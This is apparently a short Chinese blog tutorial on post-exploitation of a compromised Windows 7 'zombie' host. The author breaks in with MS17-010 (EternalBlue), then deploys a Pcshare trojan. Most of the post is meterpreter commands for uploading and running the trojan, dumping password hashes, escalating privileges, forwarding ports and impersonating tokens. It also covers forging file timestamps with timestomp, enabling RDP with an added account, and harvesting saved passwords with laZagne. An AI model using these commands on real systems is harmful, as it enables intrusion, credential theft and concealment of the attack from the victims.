Ten 对肉鸡后期攻击

2020-03-10  本文已影响0人  _Beginner

一.准备及介绍

1、本文介绍对win7肉鸡(未开防火墙)进行上下载文件等控制。

2、环境:win7、MSF、Pcshare


二. meterpreter后期攻击使用方法

1、使用Pcshare制作好木马(1.exe)后;SSH连接kali,打开MSF使用MS17-010(永恒之蓝)后:rz(把制作好的木马文件传到kali)

然后exploit;用(upload <file> <destination>):1)upload (-f) 1.exe c://inetpub(inetpub文件夹必须存在,否则会上传失败)。

 2)download <file> <path to save> :download c://17010.txt //root//csa 。

2、execute -f c://inetpub//1.exe(若文件有空格,路径需要加双引号)

3、ps(查看进程)、hashdump(转储所有账号的hash密码)、getsystem(命令可以提权到本地系统权限)

4、1)portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。

       2)add选项会将端口转发添加到列表中,而且本质上会创建一个隧道。

       3)portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

            4)删除端口转发:portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>

5、在目标主机上搜索文件:(search -f  *.txt)、获取用户ID(getuid)、获取系统信息(sysinfo)

6、1)模拟任意用户(token操作):use incognito

      2)list_tokens -u来显示所有有效的tokens

      3)impersonate_token "NT AUTHORITY\NETWORK SERVICE"

7、timestomp伪造时间戳。

                timestomp C:// -h   #查看帮助

                timestomp -v C://2.txt   #查看时间戳

                timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt

8、enable_rdp脚本开启3389:run post/windows/manage/enable_rdp  #开启远程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net

user添加;端口转发是利用的portfwd命令

9、使用laZagne查看账号密码:laZagne all >>23.txt 。

上一篇下一篇

猜你喜欢

热点阅读